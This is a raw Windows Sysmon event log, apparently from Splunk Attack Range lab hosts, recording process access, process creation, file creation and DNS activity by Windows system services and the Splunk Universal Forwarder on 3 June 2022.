14:20:50.955{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044715Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.955{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044714Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.955{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044713Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.955{0A5DF930-E35B-6299-0500-000000006002}412428C:\Windows\system32\csrss.exe{0A5DF930-18C2-629A-2D07-000000006002}3448C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044712Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.955{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-18C2-629A-2D07-000000006002}3448C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044711Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.956{0A5DF930-18C2-629A-2D07-000000006002}3448C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044710Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.830{0A5DF930-E3BE-6299-9D00-000000006002}2084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=402754FD8D06A662A4B62D4462831AFB,SHA256=CF3040980E0B2748E79D7DAADB7E5B40D5C1DCCE08A0C3670E12636D5A48AEC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044709Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.596{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D39AFD1320F0AF57A762DADCD6B8965,SHA256=7B3B856A4060065F948A42CD422AEA9099C99941373C28B476B3CCB0BB9B953C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205901Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:47.333{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53868-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domain 23542300x8000000000000000205900Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:50.251{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D470A7ADD40225AF877DA85EA434E954,SHA256=7F3A34AEE79C335D76A7DC102390D79E113EAD890A3EF9A3F25D73E15C85087B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044708Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.471{0A5DF930-18C2-629A-2C07-000000006002}32203868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044707Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.283{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-18C2-629A-2C07-000000006002}3220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044706Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.283{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044705Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.283{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044704Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.283{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044703Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.283{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044702Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.283{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044701Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.283{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044700Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.283{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044699Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.283{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044698Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.283{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044697Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.283{0A5DF930-E35B-6299-0500-000000006002}412428C:\Windows\system32\csrss.exe{0A5DF930-18C2-629A-2C07-000000006002}3220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044696Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.283{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-18C2-629A-2C07-000000006002}3220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044695Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:50.284{0A5DF930-18C2-629A-2C07-000000006002}3220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000044740Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:51.799{0A5DF930-18C3-629A-2E07-000000006002}25243104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044739Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:51.689{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33C3B0E29C9EBB7F0552EFB4C178F5BE,SHA256=D7E30C24EC85469468160B69B022D95633331C423DF7DF6850B2592CC8E8209B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044738Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:51.627{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-18C3-629A-2E07-000000006002}2524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044737Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:51.627{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044736Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:51.627{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044735Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:51.627{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044734Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 